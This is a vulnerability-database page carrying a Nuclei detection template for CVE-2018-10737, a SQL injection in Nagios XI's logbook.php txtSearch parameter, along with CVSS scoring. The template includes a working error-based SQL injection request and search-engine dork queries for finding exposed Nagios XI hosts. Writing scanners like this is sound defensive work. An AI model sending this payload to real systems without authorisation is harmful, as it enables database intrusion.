Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-10737
HistoryApr 02, 2024 - 4:22 a.m.

NagiosXI <= 5.4.12 logbook.php SQL injection

2024-04-0204:22:02
ProjectDiscovery
github.com
8
nagiosxi
sqlinjection
txtsearch
cvss
cve2018
highseverity

6.5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

7.6 High

AI Score

Confidence

High

0.037 Low

EPSS

Percentile

91.8%

A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/logbook.php txtSearch parameter.
id: CVE-2018-10737

info:
  name: NagiosXI <= 5.4.12 logbook.php SQL injection
  author: DhiyaneshDK
  severity: high
  description: |
    A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/logbook.php txtSearch parameter.
  reference:
    - https://vulners.com/seebug/SSV:97267
    - https://nvd.nist.gov/vuln/detail/CVE-2018-10737
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2018-10737
    cwe-id: CWE-89
    epss-score: 0.00403
    epss-percentile: 0.7323
    cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: nagios
    product: nagios_xi
    shodan-query: http.title:"nagios xi"
    fofa-query:
      - app="Nagios-XI"
      - title="nagios xi"
      - app="nagios-xi"
    google-query: intitle:"nagios xi"
  tags: cve,cve2018,nagios,sqli
variables:
  num: "{{rand_int(2000000000, 2100000000)}}"

http:
  - raw:
      - |
        POST /nagiosql/admin/logbook.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        txtSearch=' and (select 1 from(select count(*),concat((select (select (select md5({{num}}))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

    matchers:
      - type: word
        part: body
        words:
          - "{{md5(num)}}"
# digest: 4a0a00473045022100a0bc85e3468d486bf2bf30d05b0a67161eaff97274ffd8c0a64e1b13d5d6b0f9022067b6ba5d51273f34f28228be2afd9e12f9d7bfa1af1f5db22d81579286f5e99d:922c64590222798bb761d5b6d8e72950

6.5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

7.6 High

AI Score

Confidence

High

0.037 Low

EPSS

Percentile

91.8%

Related for NUCLEI:CVE-2018-10737